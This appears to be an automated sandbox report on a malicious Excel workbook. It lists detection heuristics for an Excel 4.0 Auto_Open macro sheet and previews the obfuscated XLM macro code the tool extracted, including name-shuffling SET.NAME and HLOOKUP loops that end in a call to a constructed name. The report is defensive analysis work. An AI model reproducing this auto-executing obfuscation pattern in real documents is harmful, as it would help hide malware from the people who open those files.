MALICIOUS
Risk Score: 140
Heuristics (3)
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6686 bytes |

SHA-256: 6f330945fe82235aa5e8ca445a732c8089bbd789643984ffb95b4cb3dee2d068
Preview script: first 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 15 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - EMASPj
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!F150
' 0018 23 LABEL : Cell Value, String Constant - axWEvRPz len=0
' 0018 26 LABEL : Cell Value, String Constant - azQPynPwstO len=0
' 0018 21 LABEL : Cell Value, String Constant - BBbQjt len=0
' 0018 24 LABEL : Cell Value, String Constant - dkulFLJMM len=0
' 0018 24 LABEL : Cell Value, String Constant - dURafMTjA len=0
' 0018 25 LABEL : Cell Value, String Constant - emOuWgrISL len=0
' 0018 27 LABEL : Cell Value, String Constant - eunNQSLyxuMx len=0
' 0018 22 LABEL : Cell Value, String Constant - FQYmrjv len=0
' 0018 27 LABEL : Cell Value, String Constant - gMReVFsJRLjb len=0
' 0018 23 LABEL : Cell Value, String Constant - hlcwjmFt len=0
' 0018 23 LABEL : Cell Value, String Constant - kJystCxc len=0
' 0018 23 LABEL : Cell Value, String Constant - LHTHVPyE len=0
' 0018 27 LABEL : Cell Value, String Constant - NAdWDLrBnJUC len=0
' 0018 21 LABEL : Cell Value, String Constant - oFsnUp len=0
' 0018 25 LABEL : Cell Value, String Constant - OOuwtymBjG len=0
' 0018 22 LABEL : Cell Value, String Constant - qPWIiWf len=0
' 0018 21 LABEL : Cell Value, String Constant - RdXYdl len=0
' 0018 27 LABEL : Cell Value, String Constant - RiDIwcFhFeCA len=0
' 0018 22 LABEL : Cell Value, String Constant - tubCtoc len=0
' 0018 26 LABEL : Cell Value, String Constant - vzAirPGQSzc len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' EMASPj,Q41,"",-971.00000000000000000000
' EMASPj,Q42,"",409.00000000000000000000
' EMASPj,Q43,"",336.00000000000000000000
' EMASPj,Q44,"",436.00000000000000000000
' EMASPj,Q45,"",531.00000000000000000000
' EMASPj,Q46,"",901.00000000000000000000
' EMASPj,F69,"SET.NAME("eunNQSLyxuMx",0+VALUE("0"))",""
' EMASPj,F71,"SET.NAME("RdXYdl",eunNQSLyxuMx)",""
' EMASPj,F73,"SET.NAME("dURafMTjA",eunNQSLyxuMx)",""
' EMASPj,F75,"SET.NAME("RiDIwcFhFeCA",COUNTA(qPWIiWf))",""
' EMASPj,F77,"SET.NAME("oFsnUp",COUNTA(BBbQjt))",""
' EMASPj,F81,[],""
' EMASPj,F85,"SET.NAME("dkulFLJMM","")",""
' EMASPj,F87,"RdXYdl",""
' EMASPj,F91,"SET.NAME("OOuwtymBjG",HLOOKUP("*",qPWIiWf,RdXYdl,FALSE))",""
' EMASPj,F96,"azQPynPwstO",""
' EMASPj,F98,"SET.NAME("vzAirPGQSzc",eunNQSLyxuMx)",""
' EMASPj,F102,[],""
' EMASPj,F106,"vzAirPGQSzc",""
' EMASPj,F109,"gMReVFsJRLjb",""
' EMASPj,F111,"NAdWDLrBnJUC",""
' EMASPj,F113,"axWEvRPz",""
' EMASPj,F116,"SET.NAME("FQYmrjv",VALUE(HLOOKUP("*",BBbQjt,axWEvRPz,FALSE)))",""
' EMASPj,F118,"tubCtoc",""
' EMASPj,F122,"dkulFLJMM",""
' EMASPj,F124,"dURafMTjA",""
' EMASPj,F127,NEXT(),""
' EMASPj,F130,"kJystCxc",""
' EMASPj,F135,[],""
' EMASPj,F138,"LHTHVPyE",""
' EMASPj,F142,NEXT(),""
' EMASPj,F147,RETURN(),""
' EMASPj,F174,"SET.NAME("emOuWgrISL",F69)",""
' EMASPj,F179,"qPWIiWf",""
' EMASPj,F184,"SET.NAME("BBbQjt",R88C11)",""
' EMASPj,F187,"SET.NAME("LHTHVPyE",194)",""
' EMASPj,F191,"SET.NAME("hlcwjmFt",6)",""
' EMASPj,F193,emOuWgrISL(),""
' EMASPj,F194,HALT(),""